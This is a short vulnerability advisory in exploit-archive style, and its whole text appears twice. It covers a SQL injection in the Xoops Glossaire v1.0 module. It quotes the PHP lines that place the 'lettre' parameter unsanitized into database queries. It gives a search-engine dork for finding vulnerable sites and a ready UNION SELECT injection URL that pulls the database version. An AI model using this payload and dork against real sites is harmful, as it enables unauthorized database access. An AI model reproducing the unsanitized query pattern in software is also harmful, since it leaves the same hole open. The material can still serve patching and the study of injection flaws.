Xoops Module (Glossaire v1.0) - Sql Injection Vulnerabilty
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.xoops.org/
.:. Dork : inurl:"/modules/glossaire/glossaire-aff.php"
####################################################################
VULNERABILITY
##############
[I] /modules/glossaire/glossaire-aff.php
Line 19-27:
list($nbe) = $db->fetch_row($db->query("SELECT COUNT(*) FROM
".$db->prefix("glossaire")." WHERE affiche='O' AND lettre='$lettre' ORDER
BY nom"));
OpenTable();
echo "<B>"._GLOSSAIRE."</B><br />\n";
$TableRep = $db->query("SELECT * FROM ".$db->prefix("glossaire")." WHERE
affiche='O' AND lettre='$lettre' ORDER BY nom LIMIT $debut,$nb_affichage");
$top=1;
$topsuivant="glossaire-aff.php?rechercher&lettre=$lettre";
#########
EXPLOIT
#########
Type: String Mysql Injection
http://SITE/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION]
http://SITE/modules/glossaire/glossaire-aff.php?lettre=A'+and+1=2+union+select+1,2,3,4,5,version()---
####################################################################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.xoops.org/
.:. Dork : inurl:"/modules/glossaire/glossaire-aff.php"
####################################################################
VULNERABILITY
##############
[I] /modules/glossaire/glossaire-aff.php
Line 19-27:
list($nbe) = $db->fetch_row($db->query("SELECT COUNT(*) FROM
".$db->prefix("glossaire")." WHERE affiche='O' AND lettre='$lettre' ORDER
BY nom"));
OpenTable();
echo "<B>"._GLOSSAIRE."</B><br />\n";
$TableRep = $db->query("SELECT * FROM ".$db->prefix("glossaire")." WHERE
affiche='O' AND lettre='$lettre' ORDER BY nom LIMIT $debut,$nb_affichage");
$top=1;
$topsuivant="glossaire-aff.php?rechercher&lettre=$lettre";
#########
EXPLOIT
#########
Type: String Mysql Injection
http://SITE/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION]
http://SITE/modules/glossaire/glossaire-aff.php?lettre=A'+and+1=2+union+select+1,2,3,4,5,version()---
####################################################################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information